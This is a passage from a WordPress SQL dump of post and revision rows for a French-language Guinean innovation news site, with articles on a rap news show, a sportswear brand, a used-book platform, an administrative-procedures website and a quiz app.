13:52:18','2017-10-25 13:52:18','','Autres','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 13:52:18','2017-10-25 13:52:18','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(556,1,'2017-10-25 13:54:35','2017-10-25 13:54:35','','Autres','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 13:54:35','2017-10-25 13:54:35','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(557,1,'2017-10-25 13:56:00','2017-10-25 13:56:00','','Plus','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 13:56:00','2017-10-25 13:56:00','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(558,1,'2017-10-25 13:57:08','2017-10-25 13:57:08',' ','','','publish','closed','closed','','558','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=558',9,'nav_menu_item','',0),(559,1,'2017-10-25 14:01:06','2017-10-25 14:01:06','<p>[custom-facebook-feed]</p>','Plus','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 14:01:06','2017-10-25 14:01:06','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(560,1,'2017-10-25 14:02:42','2017-10-25 14:02:42','','Plus','','inherit','closed','closed','','538-revision-v1','','','2017-10-25 14:02:42','2017-10-25 14:02:42','',538,'https://guineeinnove.nimbasolution.com/2017/10/25/538-revision-v1/',0,'revision','',0),(561,1,'2017-10-25 14:04:13','2017-10-25 14:04:13','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 14:04:13','2017-10-25 14:04:13','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(562,1,'2017-10-25 14:04:40','2017-10-25 14:04:40','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 14:04:40','2017-10-25 14:04:40','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(563,1,'2017-10-25 14:05:07','2017-10-25 14:05:07','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 14:05:07','2017-10-25 14:05:07','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(564,1,'2017-10-25 14:05:35','2017-10-25 14:05:35','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 14:05:35','2017-10-25 14:05:35','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(565,1,'2017-10-25 14:06:10','2017-10-25 14:06:10','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 14:06:10','2017-10-25 14:06:10','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(566,1,'2017-10-25 14:06:28','2017-10-25 14:06:28','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-10-25 14:06:28','2017-10-25 14:06:28','',2,'https://guineeinnove.nimbasolution.com/2017/10/25/2-revision-v1/',0,'revision','',0),(567,1,'2017-10-25 14:13:12','2017-10-25 14:13:12','','Economie','','inherit','closed','closed','','380-revision-v1','','','2017-10-25 14:13:12','2017-10-25 14:13:12','',380,'https://guineeinnove.nimbasolution.com/2017/10/25/380-revision-v1/',0,'revision','',0),(568,1,'2017-10-25 14:14:08','2017-10-25 14:14:08','','Economie','','inherit','closed','closed','','380-revision-v1','','','2017-10-25 14:14:08','2017-10-25 14:14:08','',380,'https://guineeinnove.nimbasolution.com/2017/10/25/380-revision-v1/',0,'revision','',0),(569,1,'2017-10-25 14:17:56','2017-10-25 14:17:56','','Santé','','inherit','closed','closed','','383-revision-v1','','','2017-10-25 14:17:56','2017-10-25 14:17:56','',383,'https://guineeinnove.nimbasolution.com/2017/10/25/383-revision-v1/',0,'revision','',0),(570,1,'2017-10-25 14:18:20','2017-10-25 14:18:20','','Santé','','inherit','closed','closed','','383-revision-v1','','','2017-10-25 14:18:20','2017-10-25 14:18:20','',383,'https://guineeinnove.nimbasolution.com/2017/10/25/383-revision-v1/',0,'revision','',0),(571,1,'2017-10-25 14:21:30','2017-10-25 14:21:30','','Culture','','inherit','closed','closed','','385-revision-v1','','','2017-10-25 14:21:30','2017-10-25 14:21:30','',385,'https://guineeinnove.nimbasolution.com/2017/10/25/385-revision-v1/',0,'revision','',0),(572,1,'2017-10-25 14:22:54','2017-10-25 14:22:54','','Culture','','inherit','closed','closed','','385-revision-v1','','','2017-10-25 14:22:54','2017-10-25 14:22:54','',385,'https://guineeinnove.nimbasolution.com/2017/10/25/385-revision-v1/',0,'revision','',0),(574,1,'2017-10-25 14:26:13','2017-10-25 14:26:13','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-10-25 14:26:13','2017-10-25 14:26:13','',359,'https://guineeinnove.nimbasolution.com/2017/10/25/359-revision-v1/',0,'revision','',0),(575,1,'2017-10-25 14:26:33','2017-10-25 14:26:33','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-10-25 14:26:33','2017-10-25 14:26:33','',359,'https://guineeinnove.nimbasolution.com/2017/10/25/359-revision-v1/',0,'revision','',0),(586,1,'2017-10-26 10:19:39','2017-10-26 10:19:39','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n.header-wrap{¨\n	height: 50px;\n}\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-26 10:19:39','2017-10-26 10:19:39','',429,'https://guineeinnove.nimbasolution.com/2017/10/26/429-revision-v1/',0,'revision','',0),(589,1,'2017-10-26 10:22:45','2017-10-26 10:22:45','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-10-26 10:22:45','2017-10-26 10:22:45','',429,'https://guineeinnove.nimbasolution.com/2017/10/26/429-revision-v1/',0,'revision','',0),(590,1,'2017-10-26 10:50:10','2017-10-26 10:50:10','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\r\n<h4>Regarder la 1 ère émission  de ce journal: « Un journal télévisé rapé au Guinée »</h4>\r\nhttps://www.youtube.com/watch?v=6swruwk4x7g&amp;t=8s','Un journal télévisé rappé en Guinée.','','publish','open','open','','un-journal-televise-rappe-par-hadafo-media-en-guinee','','','2017-11-01 13:05:15','2017-11-01 13:05:15','',0,'https://guineeinnove.nimbasolution.com/?p=590',0,'post','',0),(591,1,'2017-10-26 10:50:10','2017-10-26 10:50:10','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Un journal télévisé rappé par \"Hadafo Média\" en Guinée.','','inherit','closed','closed','','590-revision-v1','','','2017-10-26 10:50:10','2017-10-26 10:50:10','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-revision-v1/',0,'revision','',0),(592,1,'2017-10-26 10:53:27','2017-10-26 10:53:27','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\n<h3>Regarder la 1 ère émission  de France Inter : « Un journal télévisé rapé au Sénégal »</h3>\n&nbsp;\n\n&nbsp;','Un journal télévisé rappé par \"Hadafo Média\" en Guinée.','','inherit','closed','closed','','590-autosave-v1','','','2017-10-26 10:53:27','2017-10-26 10:53:27','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-autosave-v1/',0,'revision','',0),(593,1,'2017-10-26 10:54:48','2017-10-26 10:54:48','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\r\n<h3>Regarder la 1 ère émission  de ce journal: « Un journal télévisé rapé au Guinée »</h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Un journal télévisé rappé par \"Hadafo Média\" en Guinée.','','inherit','closed','closed','','590-revision-v1','','','2017-10-26 10:54:48','2017-10-26 10:54:48','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-revision-v1/',0,'revision','',0),(594,1,'2017-10-26 10:57:57','2017-10-26 10:57:57','<p>En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.</p><h3>Regarder la 1 ère émission  de ce journal: « Un journal télévisé rapé au Guinée »</h3>https://www.youtube.com/watch?v=6swruwk4x7g&#038;t=8s','Un journal télévisé rappé par \"Hadafo Média\" en Guinée.','','inherit','closed','closed','','590-revision-v1','','','2017-10-26 10:57:57','2017-10-26 10:57:57','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-revision-v1/',0,'revision','',0),(595,1,'2017-10-26 11:01:05','2017-10-26 11:01:05','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\r\n<h3>Regarder la 1 ère émission  de ce journal: « Un journal télévisé rapé au Guinée »</h3>\r\nhttps://www.youtube.com/watch?v=6swruwk4x7g&amp;t=8s','Un journal télévisé rappé par en Guinée.','','inherit','closed','closed','','590-revision-v1','','','2017-10-26 11:01:05','2017-10-26 11:01:05','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-revision-v1/',0,'revision','',0),(596,1,'2017-10-26 11:01:45','2017-10-26 11:01:45','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\r\n<h4>Regarder la 1 ère émission  de ce journal: « Un journal télévisé rapé au Guinée »</h4>\r\nhttps://www.youtube.com/watch?v=6swruwk4x7g&amp;t=8s','Un journal télévisé rappé par en Guinée.','','inherit','closed','closed','','590-revision-v1','','','2017-10-26 11:01:45','2017-10-26 11:01:45','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-revision-v1/',0,'revision','',0),(597,1,'2017-10-26 11:03:29','2017-10-26 11:03:29','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-10-26 11:03:29','2017-10-26 11:03:29','',359,'https://guineeinnove.nimbasolution.com/2017/10/26/359-revision-v1/',0,'revision','',0),(598,1,'2017-10-26 11:03:38','2017-10-26 11:03:38','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-10-26 11:03:38','2017-10-26 11:03:38','',359,'https://guineeinnove.nimbasolution.com/2017/10/26/359-revision-v1/',0,'revision','',0),(599,1,'2017-10-26 11:05:39','2017-10-26 11:05:39','','JTR','','inherit','open','closed','','jtr','','','2017-10-26 11:05:39','2017-10-26 11:05:39','',590,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/JTR.jpg',0,'attachment','image/jpeg',0),(600,1,'2017-10-26 11:09:17','2017-10-26 11:09:17','En Guinée, les téléspectateurs peuvent voir, depuis fin Septembre, sur Espace Tv, un journal télévisé version « rap », présenté par deux stars locales du hip hop (Masta G, Klimpoko). Avec un ton pour le moins décalé, ces rappeurs abordent l’actualité politique et sociale.\r\n<h4>Regarder la 1 ère émission  de ce journal: « Un journal télévisé rapé au Guinée »</h4>\r\nhttps://www.youtube.com/watch?v=6swruwk4x7g&amp;t=8s','Un journal télévisé rappé en Guinée.','','inherit','closed','closed','','590-revision-v1','','','2017-10-26 11:09:17','2017-10-26 11:09:17','',590,'https://guineeinnove.nimbasolution.com/2017/10/26/590-revision-v1/',0,'revision','',0),(601,1,'2017-10-26 11:16:58','2017-10-26 11:16:58','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-26 11:16:58','2017-10-26 11:16:58','',360,'https://guineeinnove.nimbasolution.com/2017/10/26/360-revision-v1/',0,'revision','',0),(602,1,'2017-10-26 11:17:16','2017-10-26 11:17:16','\n			<h3>Populaires</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-26 11:17:16','2017-10-26 11:17:16','',360,'https://guineeinnove.nimbasolution.com/2017/10/26/360-revision-v1/',0,'revision','',0),(603,1,'2017-10-26 11:53:44','2017-10-26 11:53:44','<p>Guinée Sport est gérée par une dame qui entend faire de la marque Nimba une fierté nationale. La nouvelle ligne de maillot a été présentée aux Guinéens à la bluezone de Conakry.</p><p>Après deux ans, Guinée Sport a enfin réussi à présenter sa marque de vêtements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a été présentée aux Guinéens à travers un défilé et une exposition vente de maillots à Conakry.</p><p>Guinée Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorités sportives guinéennes.</p><p>Avec ses sept machines à coudre, Guinée Sport a signé avec trois clubs de football de première division, l’équipe nationale de handball et plusieurs équipes scolaires et universitaires de Guinée.</p>https://www.youtube.com/watch?v=4McQdO9Hwd0','Une marque de vêtements de sport en Guinée','','publish','open','open','','une-marque-de-vetements-de-sport-en-guinee','','','2017-11-01 13:00:44','2017-11-01 13:00:44','',0,'https://guineeinnove.nimbasolution.com/?p=603',0,'post','',0),(604,1,'2017-10-26 11:45:18','2017-10-26 11:45:18','','AfricaPostNews-Guinée-vetements-de-sport','','inherit','open','closed','','africapostnews-guinee-vetements-de-sport','','','2017-10-26 11:45:18','2017-10-26 11:45:18','',603,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/AfricaPostNews-Guinée-vetements-de-sport.jpg',0,'attachment','image/jpeg',0),(605,1,'2017-10-26 11:52:44','2017-10-26 11:52:44','','JTR ESPACE TV N°000000','','inherit','open','closed','','jtr-espace-tv-n000000','','','2017-10-26 11:52:44','2017-10-26 11:52:44','',603,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/JTR-ESPACE-TV-N°000000.mp4',0,'attachment','video/mp4',0),(606,1,'2017-10-26 11:53:44','2017-10-26 11:53:44','Guinée Sport est gérée par une dame qui entend faire de la marque Nimba une fierté nationale. La nouvelle ligne de maillot a été présentée aux Guinéens à la bluezone de Conakry.\r\n\r\nAprès deux ans, Guinée Sport a enfin réussi à présenter sa marque de vêtements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a été présentée aux Guinéens à travers un défilé et une exposition vente de maillots à Conakry.\r\n<div>\r\n<div class=\"wsw\">\r\n\r\nGuinée Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorités sportives guinéennes.\r\n\r\nAvec ses sept machines à coudre, Guinée Sport a signé avec trois clubs de football de première division, l’équipe nationale de handball et plusieurs équipes scolaires et universitaires de Guinée.\r\n\r\n[video width=\"1280\" height=\"720\" mp4=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/JTR-ESPACE-TV-N°000000.mp4\"][/video]\r\n\r\n</div>\r\n</div>','Une marque de vêtements de sport en Guinée','','inherit','closed','closed','','603-revision-v1','','','2017-10-26 11:53:44','2017-10-26 11:53:44','',603,'https://guineeinnove.nimbasolution.com/2017/10/26/603-revision-v1/',0,'revision','',0),(607,1,'2017-10-26 11:56:26','2017-10-26 11:56:26',' ','','','publish','closed','closed','','607','','','2017-10-26 11:56:36','2017-10-26 11:56:36','',0,'https://guineeinnove.nimbasolution.com/?p=607',4,'nav_menu_item','',0),(608,1,'2017-10-26 11:59:35','2017-10-26 11:59:35','','Sport','','inherit','closed','closed','','526-revision-v1','','','2017-10-26 11:59:35','2017-10-26 11:59:35','',526,'https://guineeinnove.nimbasolution.com/2017/10/26/526-revision-v1/',0,'revision','',0),(609,1,'2017-10-26 11:59:51','2017-10-26 11:59:51','','Sport','','inherit','closed','closed','','526-revision-v1','','','2017-10-26 11:59:51','2017-10-26 11:59:51','',526,'https://guineeinnove.nimbasolution.com/2017/10/26/526-revision-v1/',0,'revision','',0),(611,1,'2017-10-26 12:21:26','2017-10-26 12:21:26','','Loniya','','inherit','open','closed','','loniya','','','2017-10-26 12:21:26','2017-10-26 12:21:26','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Loniya.jpg',0,'attachment','image/jpeg',0),(613,1,'2017-10-26 12:22:55','2017-10-26 12:22:55','Directeur Général de TechEvox, le jeune Alpha Diallo a lancé en 2017 une plateforme pour palier à la difficulté d\'accès au livre en Guinée.\r\n\r\nVoici les mots de Alpha Mamadou Diallo:\r\n\r\n\"En 2017, Les projecteurs du monde se tournent vers Conakry désignée comme Capitale Mondiale du Livre. Mais force est de constater que la jeunesse guinéenne lit très peu. Ce manque d’engouement pour la lecture cache en réalité un problème plus profond. Les livres ne sont guère à la portée de toutes les bourses. Afin de faciliter l’accès au livre, nous avons développé une plateforme web/mobile dénommée « Loniya » Loniya, expression tirée du terme malinké « Lonniya » désignant la connaissance, est une application d’achat, de vente et d’échange de livres d’occasion créée par TechEvox. Cette initiative est née du constat fait sur la difficulté (liée à la cherté et la rareté des lieux de vente) d’accès aux livres neufs pour les masses. Fort de la vulgarisation de l’outil internet par une majeure partie de la population, TechEvox se propose de faciliter les mises en relation client/vendeur à travers sa plateforme <a href=\"https://www.loniya.org/\">www.loniya.org</a>. Afin, de ne pas laisser les lecteurs à la merci de la bulle spéculative, un algorithme sera mis en place pour modérer les transactions afin qu’elles respectent un seuil de prix fixe pour les versions physiques d’œuvres littéraires. De même, certaines œuvres « du domaine public », en conformité avec le respect des droits d’auteurs seront également disponibles en téléchargement libre en version numérique sur le site. La démarche de TechEvox qui se veut sociale, est de rendre cette application interactive, mais aussi d’initier et rapprocher les populations cibles de ce type inédit de librairie. Loniya permettra aux utilisateurs de vendre leurs lectures et de se procurer de nouvelles lectures plus enrichissantes. Tous les ouvrages peuvent être publiés sur la plateforme, allant des ouvrages scolaires/académiques en passant par les romans d’auteurs locaux et des livres d’auteurs célèbres, bien souvent difficiles à trouver sur le marché guinéen, permettant ainsi à la lecture d’être à la portée de tous.\"','Alpha Mamadou Diallo crée une plateforme pour faciliter l’accès au livre.','','publish','open','open','','alpha-mamadou-diallo-cree-une-plateforme-pour-faciliter-lacces-au-livre','','','2017-11-02 15:10:32','2017-11-02 15:10:32','',0,'https://guineeinnove.nimbasolution.com/?p=613',0,'post','',2),(614,1,'2017-10-26 12:22:31','2017-10-26 12:22:31','','Loniya','','inherit','open','closed','','loniya-2','','','2017-10-26 12:22:31','2017-10-26 12:22:31','',613,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Loniya-1.jpg',0,'attachment','image/jpeg',0),(616,1,'2017-10-26 12:22:55','2017-10-26 12:22:55','En 2017, Les projecteurs du monde se tournent vers Conakry désignée comme Capitale Mondiale du Livre. Mais force est de constater que la jeunesse guinéenne lit très peu. Ce manque d’engouement pour la lecture cache en réalité un problème plus profond. Les livres ne sont guère à la portée de toutes les bourses. Afin de faciliter l’accès au livre, nous avons développé une plateforme web/mobile dénommée « Loniya » Loniya, expression tirée du terme malinké « Lonniya » désignant la connaissance, est une application d’achat, de vente et d’échange de livres d’occasion créée par TechEvox. Cette initiative est née du constat fait sur la difficulté (liée à la cherté et la rareté des lieux de vente) d’accès aux livres neufs pour les masses. Fort de la vulgarisation de l’outil internet par une majeure partie de la population, TechEvox se propose de faciliter les mises en relation client/vendeur à travers sa plateforme <a href=\"https://www.loniya.org/\">www.loniya.org</a>. Afin, de ne pas laisser les lecteurs à la merci de la bulle spéculative, un algorithme sera mis en place pour modérer les transactions afin qu’elles respectent un seuil de prix fixe pour les versions physiques d’œuvres littéraires. De même, certaines œuvres « du domaine public », en conformité avec le respect des droits d’auteurs seront également disponibles en téléchargement libre en version numérique sur le site. La démarche de TechEvox qui se veut sociale, est de rendre cette application interactive, mais aussi d’initier et rapprocher les populations cibles de ce type inédit de librairie. Loniya permettra aux utilisateurs de vendre leurs lectures et de se procurer de nouvelles lectures plus enrichissantes. Tous les ouvrages peuvent être publiés sur la plateforme, allant des ouvrages scolaires/académiques en passant par les romans d’auteurs locaux et des livres d’auteurs célèbres, bien souvent difficiles à trouver sur le marché guinéen, permettant ainsi à la lecture d’être à la portée de tous.','Alpha Mamadou Diallo crée une plateforme pour faciliter l’accès au livre.','','inherit','closed','closed','','613-revision-v1','','','2017-10-26 12:22:55','2017-10-26 12:22:55','',613,'https://guineeinnove.nimbasolution.com/2017/10/26/613-revision-v1/',0,'revision','',0),(618,1,'2017-10-26 12:30:37','2017-10-26 12:30:37','','Mamadou Alpha Diallo','','inherit','open','closed','','mamadou-alpha-diallo','','','2017-10-26 12:30:37','2017-10-26 12:30:37','',613,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Mamadou-Alpha-Diallo.jpg',0,'attachment','image/jpeg',0),(619,1,'2017-10-26 12:45:22','2017-10-26 12:45:22','La Guinée dispose désormais d’un outil d’informations sur les procédures administratives. Le site web <a href=\"http://www.porcedures-guinee.org/\">www.porcedures-guinee.org</a> accessible à tous permet  d’obtenir des renseignements sur : les documents  de l’état civil, les visas et ambassades, la fiscalité et les procédures douanières, l’emploi et règlements du travail ainsi que la création d’entreprises et ONGs. La procédure d’immigration et l\'émigration sur la Guinée sont aussi disponibles.\r\n\r\nPour le président de cette ONG, l’objectif de cette plate-forme est d’informer l’Etat  de la corruption et  de la surfacturation dont sont victimes les citoyens.\r\n\r\n<img class=\"alignnone size-medium wp-image-621\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ocp-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />« Plusieurs jeunes leaders se sont mobilisés pour protéger les citoyens contre les abus des fonctionnaires de l’Etat », souligne Ibrahima Gueye, regrettant que des policiers continuent de soutirer de l’argent aux passagers dans les frontières.\r\n\r\nDans la même lancée, le fondateur de l’organisation changement positif,  Mamoudou Nagnalen  Barry, a indiqué que le site web  est conçu pour lutter contre la petite corruption à travers  des dénonciations sur la page facebook  et le numéro vert 660 42 42 55.','Une plateforme d\'informations sur les procédures administratives.','','publish','open','open','','une-plateforme-dinformations-sur-les-procedures-administratives','','','2017-11-01 12:36:32','2017-11-01 12:36:32','',0,'https://guineeinnove.nimbasolution.com/?p=619',0,'post','',0),(620,1,'2017-10-26 12:43:07','2017-10-26 12:43:07','','ocp3','','inherit','open','closed','','ocp3','','','2017-10-26 12:43:07','2017-10-26 12:43:07','',619,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ocp3.jpg',0,'attachment','image/jpeg',0),(621,1,'2017-10-26 12:44:43','2017-10-26 12:44:43','','ocp-2','','inherit','open','closed','','ocp-2','','','2017-10-26 12:44:43','2017-10-26 12:44:43','',619,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ocp-2.jpg',0,'attachment','image/jpeg',0),(622,1,'2017-10-26 12:45:22','2017-10-26 12:45:22','La Guinée dispose désormais d’un outil d’informations sur les procédures administratives. Le site web <a href=\"http://www.porcedures-guinee.org/\">www.porcedures-guinee.org</a> accessible à tous permet  d’obtenir des renseignements sur : les documents  de l’état civil, les visas et ambassades, la fiscalité et les procédures douanières, l’emploi et règlements du travail ainsi que la création d’entreprises et ONGs. La procédure d’immigration et l\'émigration sur la Guinée sont aussi disponibles.\r\n\r\nPour le président de cette ONG, l’objectif de cette plate-forme est d’informer l’Etat  de la corruption et  de la surfacturation dont sont victimes les citoyens.\r\n\r\n<img class=\"alignnone size-medium wp-image-621\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ocp-2-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />« Plusieurs jeunes leaders se sont mobilisés pour protéger les citoyens contre les abus des fonctionnaires de l’Etat », souligne Ibrahima Gueye, regrettant que des policiers continuent de soutirer de l’argent aux passagers dans les frontières.\r\n\r\nDans la même lancée, le fondateur de l’organisation changement positif,  Mamoudou Nagnalen  Barry, a indiqué que le site web  est conçu pour lutter contre la petite corruption à travers  des dénonciations sur la page facebook  et le numéro vert 660 42 42 55.','Une plateforme d\'informations sur les procédures administratives.','','inherit','closed','closed','','619-revision-v1','','','2017-10-26 12:45:22','2017-10-26 12:45:22','',619,'https://guineeinnove.nimbasolution.com/2017/10/26/619-revision-v1/',0,'revision','',0),(623,1,'2017-10-26 13:01:21','2017-10-26 13:01:21','','Yali-Guinée','','inherit','open','closed','','yali-guinee','','','2017-10-26 13:01:21','2017-10-26 13:01:21','',619,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Yali-Guinée.jpg',0,'attachment','image/jpeg',0),(626,1,'2017-10-26 13:16:07','2017-10-26 13:16:07','Mamoudou Diallo, jeune programmeur guinéen a crée l\'application <a href=\"https://play.google.com/store/apps/details?id=com.moudjames23.quiz224\"><strong>Quizz 224</strong></a> qui est une application <em>ludique</em>, <em> intuitive</em>, qui permet aux guinéens de faire une petite révision globale sur leur pays avec des questions amusantes portant sur la géographie, l’histoire, la culture guinéenne ainsi que le sport.\r\n\r\n<img class=\"alignnone size-medium wp-image-627\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/unnamed-169x300.png\" alt=\"\" width=\"169\" height=\"300\" />','Mamoudou Diallo, Créateur de Quizz224','','publish','open','open','','mamoudou-diallo-createur-de-quizz224','','','2017-11-01 12:34:15','2017-11-01 12:34:15','',0,'https://guineeinnove.nimbasolution.com/?p=626',0,'post','',0),(627,1,'2017-10-26 13:14:05','2017-10-26 13:14:05','','unnamed','','inherit','open','closed','','unnamed','','','2017-10-26 13:14:05','2017-10-26 13:14:05','',626,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/unnamed.png',0,'attachment','image/png',0),(628,1,'2017-10-26 13:14:20','2017-10-26 13:14:20','','Mood','','inherit','open','closed','','mood','','','2017-10-26 13:14:20','2017-10-26 13:14:20','',626,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Mood.jpg',0,'attachment','image/jpeg',0),(630,1,'2017-10-26 13:16:07','2017-10-26 13:16:07','Mamoudou Diallo, jeune programmeur guinéen a crée l\'application <a href=\"https://play.google.com/store/apps/details?id=com.moudjames23.quiz224\"><strong>Quizz 224</strong></a> qui est une application <em>ludique</em>, <em> intuitive</em>, qui permet aux guinéens de faire une petite révision globale sur leur pays avec des questions amusantes portant sur la géographie, l’histoire, la culture guinéenne ainsi que le sport.\r\n\r\n<img class=\"alignnone size-medium wp-image-627\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/unnamed-169x300.png\" alt=\"\" width=\"169\" height=\"300\" />','Mamoudou Diallo, Créateur de Quizz224','','inherit','closed','closed','','626-revision-v1','','','2017-10-26 13:16:07','2017-10-26 13:16:07','',626,'https://guineeinnove.nimbasolution.com/2017/10/26/626-revision-v1/',0,'revision','',0),(631,1,'2017-10-26 13:17:33','2017-10-26 13:17:33','Mamoudou Diallo, jeune programmeur guinéen a crée l\'application <a href=\"https://play.google.com/store/apps/details?id=com.moudjames23.quiz224\"><strong>Quizz 224</strong></a> qui est une application <em>ludique</em>, <em> intuitive</em>, qui permet aux guinéens de faire une petite révision globale sur leur pays avec des questions amusantes portant sur la géographie, l’histoire, la culture guinéenne ainsi que le sport.\n\n<img class=\"alignnone size-medium wp-image-627\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/unnamed-169x300.png\" alt=\"\" width=\"169\" height=\"300\" />','Mamoudou Diallo, Crée une application ludia','','inherit','closed','closed','','626-autosave-v1','','','2017-10-26 13:17:33','2017-10-26 13:17:33','',626,'https://guineeinnove.nimbasolution.com/2017/10/26/626-autosave-v1/',0,'revision','',0),(632,1,'2017-10-26 13:36:17','2017-10-26 13:36:17','<p>Samba Sory Camaraest un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.</p><p>Regardez cette petite vidéo...</p>https://www.youtube.com/watch?time_continue=16&#038;v=wQaejvxoQ2o','Sambako et sa petite révolution agricole.','','publish','open','open','','sambako-et-sa-petite-revolution-agricole','','','2017-11-06 09:31:08','2017-11-06 09:31:08','',0,'https://guineeinnove.nimbasolution.com/?p=632',0,'post','',2),(633,1,'2017-10-26 